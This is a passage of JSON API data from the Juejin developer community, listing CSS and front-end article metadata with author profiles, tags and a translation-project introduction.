"select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546516, "tag_id": "6809640394175971342", "tag_name": "CSS", "color": "#244DE4", "icon": 
"https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/66de0c4eb9d10130d5bf.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432239426, "mtime": 1631688735, "id_type": 9, "tag_alias": "", "post_article_count": 14981, "concern_user_count": 297034}], "user_interact": {"id": 6958857811795279880, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516034201020405107116006995"}, {"article_id": "6969873114394001438", "article_info": {"article_id": "6969873114394001438", "user_id": "4424090520138744", "category_id": "6809637767543259144", "tag_ids": [6809640394175971342], "visible_level": 0, "link_url": "", "cover_image": "", "is_gfw": 0, "title": "BFC (Block Formatting Contexts) 块格式化上下文", "brief_content": "BFC (Block Formatting Contexts) 块格式化上下文,是页面上的一个独立渲染的区域,该区域会包含器内部的所有元素,并且区域内元素的渲染不会影响到区域外的元素", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1622800067", "mtime": "1623065754", "rtime": "1623065754", "draft_id": "6969861442296086541", "view_count": 187, "collect_count": 5, "digg_count": 5, "comment_count": 0, "hot_index": 14, "is_hot": 0, "rank_index": 0.00056797, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "4424090520138744", "user_name": "佛系小玩家", "company": "", "job_title": "前端", "avatar_large": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2018/8/23/1656559a733cd346~tplv-t2oaga2asx-image.image", "level": 1, "description": "瞎折腾的前端", "followee_count": 45, "follower_count": 2, "post_article_count": 18, "digg_article_count": 70, "got_digg_count": 9, "got_view_count": 8943, "post_shortmsg_count": 0, "digg_shortmsg_count": 0, "isfollowed": false, "favorable_author": 0, "power": 98, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, 
"major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546516, "tag_id": "6809640394175971342", "tag_name": "CSS", "color": "#244DE4", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/66de0c4eb9d10130d5bf.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432239426, "mtime": 1631688735, "id_type": 9, "tag_alias": "", "post_article_count": 14981, "concern_user_count": 297034}], "user_interact": {"id": 6969873114394001438, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516034201020405107116006995"}, {"article_id": "6912656994667069454", "article_info": {"article_id": "6912656994667069454", "user_id": "1099167361165710", "category_id": "6809637767543259144", "tag_ids": [6809640394175971342], "visible_level": 0, "link_url": "", "cover_image": "", "is_gfw": 0, "title": "移动端开发套路总结", "brief_content": "本文只讲最基础的套路(适配问题),其他特殊问题特殊解决。 对于新项目开发,上文说的方式其实已经算最优解了。至于之前主流的方案lib-flexible+postcss-pxtorem的方案比较麻烦,而且lib-flexible的作者都说放弃了,改用viewport来代替此方案(h…", "is_english": 0, "is_original": 1, "user_index": 1.906920898424682, "original_type": 0, "original_author": "", "content": "", "ctime": "1609478643", "mtime": "1609487398", "rtime": "1609487398", "draft_id": "6912657803697995790", "view_count": 722, "collect_count": 19, 
"digg_count": 10, "comment_count": 0, "hot_index": 46, "is_hot": 0, "rank_index": 0.00056744, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "1099167361165710", "user_name": "李牧敲代码", "company": "company", "job_title": "web", "avatar_large": "https://sf3-ttcdn-tos.pstatp.com/img/mosaic-legacy/3791/5035712059~300x300.image", "level": 2, "description": "web", "followee_count": 3, "follower_count": 4, "post_article_count": 42, "digg_article_count": 12, "got_digg_count": 29, "got_view_count": 22737, "post_shortmsg_count": 0, "digg_shortmsg_count": 0, "isfollowed": false, "favorable_author": 0, "power": 256, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546516, "tag_id": "6809640394175971342", "tag_name": "CSS", "color": "#244DE4", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/66de0c4eb9d10130d5bf.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432239426, "mtime": 1631688735, "id_type": 9, "tag_alias": "", "post_article_count": 14981, "concern_user_count": 297034}], "user_interact": {"id": 6912656994667069454, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": 
"2021091516034201020405107116006995"}, {"article_id": "6844903550821072910", "article_info": {"article_id": "6844903550821072910", "user_id": "2911162518736152", "category_id": "6809637767543259144", "tag_ids": [6809640406058270733, 6809640407484334093, 6809640394175971342, 6809640837895585805], "visible_level": 0, "link_url": "http://elevenbeans.github.io/2018/01/12/front-end-layout-methods/", "cover_image": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2018/1/15/160f90853bdb08a7~tplv-t2oaga2asx-image.image", "is_gfw": 0, "title": "前端布局方式汇总及概念浅析", "brief_content": "1. 基础布局方式 2. 常见的布局概念以及实现方法 3. 响应式设计和自适应设计", "is_english": 0, "is_original": 0, "user_index": 0, "original_type": 1, "original_author": "", "content": "", "ctime": "1516006561", "mtime": "1598444446", "rtime": "1516006561", "draft_id": "0", "view_count": 4006, "collect_count": 106, "digg_count": 206, "comment_count": 4, "hot_index": 410, "is_hot": 0, "rank_index": 0.00056716, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "2911162518736152", "user_name": "Elevenbeans", "company": "Ctrip IBU", "job_title": "前端开发", "avatar_large": "https://sf1-ttcdn-tos.pstatp.com/img/user-avatar/46ab7a7d211e0ba6b5d5d4e07136ad81~300x300.image", "level": 3, "description": "出道于阿里,目前就职于携程 IBU。前端非资深。熟悉 React,略懂 Node。", "followee_count": 15, "follower_count": 447, "post_article_count": 27, "digg_article_count": 135, "got_digg_count": 2159, "got_view_count": 74595, "post_shortmsg_count": 0, "digg_shortmsg_count": 4, "isfollowed": false, "favorable_author": 0, "power": 1115, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": 
"6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546525, "tag_id": "6809640406058270733", "tag_name": "设计", "color": "#F56868", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/f2e3a6fceb1a4f1ce6b6.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 1, "ctime": 1435971510, "mtime": 1631689661, "id_type": 9, "tag_alias": "", "post_article_count": 6064, "concern_user_count": 218547}, {"id": 2546526, "tag_id": "6809640407484334093", "tag_name": "前端", "color": "#60ADFF", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/bac28828a49181c34110.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 1, "ctime": 1435971546, "mtime": 1631692835, "id_type": 9, "tag_alias": "", "post_article_count": 88828, "concern_user_count": 527704}, {"id": 2546516, "tag_id": "6809640394175971342", "tag_name": "CSS", "color": "#244DE4", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/66de0c4eb9d10130d5bf.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432239426, "mtime": 1631688735, "id_type": 9, "tag_alias": "", "post_article_count": 14981, "concern_user_count": 297034}, {"id": 2546837, "tag_id": "6809640837895585805", "tag_name": "服务器", "color": "#a3abad", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/be1879c7e9983dab0049.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1489042149, "mtime": 1631666741, "id_type": 9, "tag_alias": "", "post_article_count": 10408, "concern_user_count": 20830}], "user_interact": {"id": 6844903550821072910, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": 
false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516034201020405107116006995"}, {"article_id": "6942788958480760862", "article_info": {"article_id": "6942788958480760862", "user_id": "3438928104021463", "category_id": "6809637767543259144", "tag_ids": [6809640394175971342], "visible_level": 0, "link_url": "", "cover_image": "", "is_gfw": 0, "title": "css - 选择器优先级", "brief_content": "从CSS选择器文章中我们知道,与多种不同的方法选择元素。所以当我们使用多种规则的时候,我们必须要明确其中的优先级。但是在CSS选择器的规则中,称之为特殊性,特殊性越高,自然优先级越高。 对于选择器中给定的元素选择器和伪元素,加0001. 当选择器出于同一种特殊性的时候,位于cs…", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1616494222", "mtime": "1620196409", "rtime": "1616553967", "draft_id": "6942782019369697288", "view_count": 404, "collect_count": 2, "digg_count": 9, "comment_count": 0, "hot_index": 29, "is_hot": 0, "rank_index": 0.00056563, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "3438928104021463", "user_name": "耳东蜗牛", "company": "公众号【前端耳东蜗牛】", "job_title": "前端主管", "avatar_large": "https://sf1-ttcdn-tos.pstatp.com/img/user-avatar/e2c8e2f6002476ed4f6d797ecacba90d~300x300.image", "level": 3, "description": "公众号【前端耳东蜗牛】。前端学习,前端负责人培养,前端架构设计。", "followee_count": 34, "follower_count": 891, "post_article_count": 60, "digg_article_count": 242, "got_digg_count": 2944, "got_view_count": 112160, "post_shortmsg_count": 14, "digg_shortmsg_count": 5, "isfollowed": false, "favorable_author": 0, "power": 4065, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", 
"category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546516, "tag_id": "6809640394175971342", "tag_name": "CSS", "color": "#244DE4", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/66de0c4eb9d10130d5bf.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432239426, "mtime": 1631688735, "id_type": 9, "tag_alias": "", "post_article_count": 14981, "concern_user_count": 297034}], "user_interact": {"id": 6942788958480760862, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516034201020405107116006995"}, {"article_id": "6844903517971283982", "article_info": {"article_id": "6844903517971283982", "user_id": "1626932938285976", "category_id": "6809637767543259144", "tag_ids": [6809640420889346056, 6809640407484334093, 6809640394175971342, 6809640398105870343], "visible_level": 0, "link_url": "https://juejin.im/post/6844903517971283982", "cover_image": "", "is_gfw": 0, "title": "如何用语文知识改善代码可读性", "brief_content": "我们经常能看到许多技术文章从工程角度介绍各种编码实践。不过在计算机科学之外,编程语言和自然语言之间同样有着千丝万缕的联系。下面我们会从高中水平的语文和英语出发,分析它们与代码可读性之间的关系。如果你看腻了各种花哨的技术新概念,或许回归基础的本文能给你一些启发🤔 代码很难正确预…", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1512033745", "mtime": "1598438812", "rtime": "1512033745", "draft_id": "6845075320630935559", "view_count": 4634, "collect_count": 32, "digg_count": 159, "comment_count": 37, "hot_index": 427, "is_hot": 0, "rank_index": 0.00056549, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "1626932938285976", "user_name": 
"doodlewind", "company": "稿定科技", "job_title": "花名雪碧的小透明", "avatar_large": "https://sf3-ttcdn-tos.pstatp.com/img/user-avatar/ecbaedae9c3d45716d5c30f94436877b~300x300.image", "level": 5, "description": "过气啦", "followee_count": 52, "follower_count": 9994, "post_article_count": 72, "digg_article_count": 58, "got_digg_count": 12711, "got_view_count": 591008, "post_shortmsg_count": 4, "digg_shortmsg_count": 20, "isfollowed": false, "favorable_author": 1, "power": 18632, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546536, "tag_id": "6809640420889346056", "tag_name": "编程语言", "color": "#C679FF", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/cde94583e8f0ca3f6127.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1435972663, "mtime": 1631690928, "id_type": 9, "tag_alias": "", "post_article_count": 3637, "concern_user_count": 120863}, {"id": 2546526, "tag_id": "6809640407484334093", "tag_name": "前端", "color": "#60ADFF", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/bac28828a49181c34110.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 1, "ctime": 1435971546, "mtime": 1631692835, "id_type": 9, "tag_alias": "", "post_article_count": 88828, "concern_user_count": 527704}, {"id": 2546516, "tag_id": 
"6809640394175971342", "tag_name": "CSS", "color": "#244DE4", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/66de0c4eb9d10130d5bf.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432239426, "mtime": 1631688735, "id_type": 9, "tag_alias": "", "post_article_count": 14981, "concern_user_count": 297034}, {"id": 2546519, "tag_id": "6809640398105870343", "tag_name": "JavaScript", "color": "#616161", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/5d70fd6af940df373834.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1435884803, "mtime": 1631692583, "id_type": 9, "tag_alias": "", "post_article_count": 67405, "concern_user_count": 398956}], "user_interact": {"id": 6844903517971283982, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516034201020405107116006995"}, {"article_id": "6970670612196884517", "article_info": {"article_id": "6970670612196884517", "user_id": "3852296999413352", "category_id": "6809637767543259144", "tag_ids": [6809640394175971342], "visible_level": 0, "link_url": "", "cover_image": "", "is_gfw": 0, "title": "CSS 盒子模型之边框(border)的注意点", "brief_content": "HTML 中如 <div></div> <span></span> <p></p> 等元素在网页上都是以一个方形盒子呈现,每个元素都叫做一个盒子,我们可以给这些盒子设置宽、高、内边距、外边距等参数来调", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1622985761", "mtime": "1623067295", "rtime": "1623032895", "draft_id": "6970665344142671909", "view_count": 276, "collect_count": 0, "digg_count": 1, "comment_count": 0, "hot_index": 14, "is_hot": 0, "rank_index": 0.00056548, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "3852296999413352", "user_name": "夕暮寒露", "company": "", "job_title": "", "avatar_large": 
"https://sf1-ttcdn-tos.pstatp.com/img/user-avatar/a348999aa32f206c68924655a914cd7c~300x300.image", "level": 1, "description": "", "followee_count": 1, "follower_count": 1, "post_article_count": 14, "digg_article_count": 22, "got_digg_count": 39, "got_view_count": 2816, "post_shortmsg_count": 0, "digg_shortmsg_count": 0, "isfollowed": false, "favorable_author": 0, "power": 67, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546516, "tag_id": "6809640394175971342", "tag_name": "CSS", "color": "#244DE4", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/66de0c4eb9d10130d5bf.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432239426, "mtime": 1631688735, "id_type": 9, "tag_alias": "", "post_article_count": 14981, "concern_user_count": 297034}], "user_interact": {"id": 6970670612196884517, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516034201020405107116006995"}, {"article_id": "6888471725080903687", "article_info": {"article_id": "6888471725080903687", "user_id": "3940267903440856", "category_id": "6809637767543259144", "tag_ids": [6809640614175604744, 6809640394175971342], "visible_level": 0, "link_url": "", 
"cover_image": "", "is_gfw": 0, "title": "使用原生 CSS 实现响应式字体", "brief_content": "有时需要根据屏幕宽度将字体大小比例进行适配操作。奇怪的是,我见过有人为了实现这个功能经历了重重困难。例如 Ahmed Sakr 在他的文章 Medium 中概述的 RFS 的使用,尽管他很好地概述了 RFS 如何工作的,但在 CSS3 计算和比较时代,RFS 本身却是过时的淘汰…", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1603847344", "mtime": "1615273929", "rtime": "1603858966", "draft_id": "6888470407083786247", "view_count": 943, "collect_count": 11, "digg_count": 15, "comment_count": 2, "hot_index": 64, "is_hot": 0, "rank_index": 0.00056467, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "3940267903440856", "user_name": "Z招锦", "company": "税友集团", "job_title": "前端开发", "avatar_large": "https://sf6-ttcdn-tos.pstatp.com/img/user-avatar/7db45971152a94b4859c2e8bd72996ec~300x300.image", "level": 3, "description": "", "followee_count": 326, "follower_count": 85, "post_article_count": 44, "digg_article_count": 1346, "got_digg_count": 876, "got_view_count": 42310, "post_shortmsg_count": 0, "digg_shortmsg_count": 0, "isfollowed": false, "favorable_author": 1, "power": 1299, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546676, "tag_id": "6809640614175604744", "tag_name": "掘金翻译计划", "color": "#0081ff", "icon": 
"https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/95f7e8be776556ab8d82.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1454716787, "mtime": 1631689800, "id_type": 9, "tag_alias": "", "post_article_count": 2502, "concern_user_count": 42848}, {"id": 2546516, "tag_id": "6809640394175971342", "tag_name": "CSS", "color": "#244DE4", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/66de0c4eb9d10130d5bf.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432239426, "mtime": 1631688735, "id_type": 9, "tag_alias": "", "post_article_count": 14981, "concern_user_count": 297034}], "user_interact": {"id": 6888471725080903687, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": {"org_type": 1, "org_id": "6930489296285597696", "online_version_id": 6937212594310610981, "latest_version_id": 6937212594310610981, "power": 10141, "ctime": 1613630284, "mtime": 1631692819, "audit_status": 2, "status": 0, "org_version": {"version_id": "6937212594310610981", "icon": "https://p6-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/9763b1fa556f4cbd8ced21b60d3ed40c~tplv-k3u1fbpfcp-watermark.image", "background": "https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/2254bf401c3444129f8e3612c4b16308~tplv-k3u1fbpfcp-watermark.image", "name": "掘金翻译计划", "introduction": "# 掘金翻译计划\n\n\n[掘金翻译计划](https://juejin.im/tag/%E6%8E%98%E9%87%91%E7%BF%BB%E8%AF%91%E8%AE%A1%E5%88%92) 是一个翻译优质互联网技术文章的社区,文章来源为 [掘金](https://juejin.im) 上的英文分享文章。内容覆盖[区块链](#区块链)、[人工智能](#ai--deep-learning--machine-learning)、[Android](#android)、[iOS](#ios)、[前端](#前端)、[后端](#后端)、[设计](#设计)、[产品](#产品)、[算法](https://github.com/xitu/gold-miner/blob/master/algorithm.md)和[其他](#其他)等领域,以及各大型优质 [官方文档及手册](#官方文档及手册),读者为热爱新技术的新锐开发者。\n\n掘金翻译计划目前翻译完成 [2027](#近期文章列表) 余篇文章,官方文档及手册 [13](#官方文档及手册) 个,共有 [1000](https://github.com/xitu/gold-miner/wiki/%E8%AF%91%E8%80%85%E7%A7%AF%E5%88%86%E8%A1%A8) 余名译者贡献翻译和校对。\n\n# 
官方指南\n\n[**推荐优质英文文章到掘金翻译计划**](https://github.com/xitu/gold-miner/issues/new/choose)\n\n<!--\nhttps://github.com/xitu/gold-miner/issues/new?title=推荐优秀英文文章&body=-%20原文链接:推荐文章前%20Google%20一下,尽量保证本文未被翻译%0A-%20简要介绍:介绍一下好不好啦,毕竟小编也看不太懂哎_(:з」∠)_)\n-->\n\n### 翻译计划译者教程\n\n1. [如何参与翻译](https://github.com/xitu/gold-miner/wiki/%E5%A6%82%E4%BD%95%E5%8F%82%E4%B8%8E%E7%BF%BB%E8%AF%91)\n2. [关于如何提交翻译以及后续更新的教程](https://github.com/xitu/gold-miner/wiki/%E5%85%B3%E4%BA%8E%E5%A6%82%E4%BD%95%E6%8F%90%E4%BA%A4%E7%BF%BB%E8%AF%91%E4%BB%A5%E5%8F%8A%E5%90%8E%E7%BB%AD%E6%9B%B4%E6%96%B0%E7%9A%84%E6%95%99%E7%A8%8B)\n3. [如何参与校对及校对的正确姿势](https://github.com/xitu/gold-miner/wiki/%E5%8F%82%E4%B8%8E%E6%A0%A1%E5%AF%B9%E7%9A%84%E6%AD%A3%E7%A1%AE%E5%A7%BF%E5%8A%BF)\n4. [文章分享到掘金指南](https://github.com/xitu/gold-miner/wiki/%E5%88%86%E4%BA%AB%E5%88%B0%E6%8E%98%E9%87%91%E6%8C%87%E5%8D%97)\n5. [译文排版规则指北](https://github.com/xitu/gold-miner/wiki/%E8%AF%91%E6%96%87%E6%8E%92%E7%89%88%E8%A7%84%E5%88%99%E6%8C%87%E5%8C%97)\n6.[积分兑换:小礼物列表](https://github.com/xitu/gold-miner/wiki/%E7%A7%AF%E5%88%86%E5%85%91%E6%8D%A2)\n\n\n\n\n", "weibo_link": "", "github_link": "https://github.com/xitu/gold-miner", "homepage_link": "", "ctime": 1615486318, "mtime": 1615486318, "org_id": "6930489296285597696", "brief_introduction": "一个帮助开发者成长的社区", "introduction_preview": "掘金翻译计划\n掘金翻译计划 是一个翻译优质互联网技术文章的社区,文章来源为 掘金 上的英文分享文章。内容覆盖区块链、人工智能、Android、iOS、前端、后端、设计、产品、算法和其他等领域,以及各大型优质 官方文档及手册,读者为热爱新技术的新锐开发者。\n掘金翻译计划目前翻译完成 2027 余篇文章,官方文档及手册 13 个,共有 1000 余名译者贡献翻译和校对。\n官方指南\n推荐优质英文文章到掘金翻译计划\n翻译计划译者教程\n\n如何参与翻译\n关于如何提交翻译以及后续更新的教程\n如何参与校对及校对的正确姿势\n文章分享到掘金指南\n译文排版规则指北\n6.积分兑换:小礼物列表\n"}, "follower_count": 1080, "article_view_count": 504149, "article_digg_count": 5100}, "org_user": null, "is_followed": false}, "req_id": "2021091516034201020405107116006995"}, {"article_id": "6844903891184648205", "article_info": {"article_id": "6844903891184648205", "user_id": "2911162518997064", "category_id": "6809637767543259144", "tag_ids": [6809640394175971342], 
"visible_level": 0, "link_url": "https://juejin.im/post/6844903891184648205", "cover_image": "", "is_gfw": 0, "title": "利用css‘content实现指令式tooltip文字提示", "brief_content": "直接上图分析执行流程鼠标移入节点检测是该节点是否存在开启实现tooltip实现的标识(类名,属性等)检测主题、位置(类名,属性等)生成/显示气泡借鉴他人让我们先来看看element-ui的toolti", "is_english": 0, "is_original": 1, "user_index": 0.004235361169642, "original_type": 0, "original_author": "", "content": "", "ctime": "1563329258", "mtime": "1599995995", "rtime": "1563331138", "draft_id": "6845076377989808141", "view_count": 3093, "collect_count": 55, "digg_count": 43, "comment_count": 9, "hot_index": 206, "is_hot": 0, "rank_index": 0.00056466, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "2911162518997064", "user_name": "聪明的汤姆", "company": "", "job_title": "", "avatar_large": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2020/4/21/1719a911e0a373a8~tplv-t2oaga2asx-image.image", "level": 4, "description": "喜欢研究不为人知的前端技巧,让我们一起在月球时代的白日梦里畅游吧🤩", "followee_count": 37, "follower_count": 5757, "post_article_count": 16, "digg_article_count": 46, "got_digg_count": 6034, "got_view_count": 161168, "post_shortmsg_count": 10, "digg_shortmsg_count": 6, "isfollowed": false, "favorable_author": 1, "power": 7645, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, 
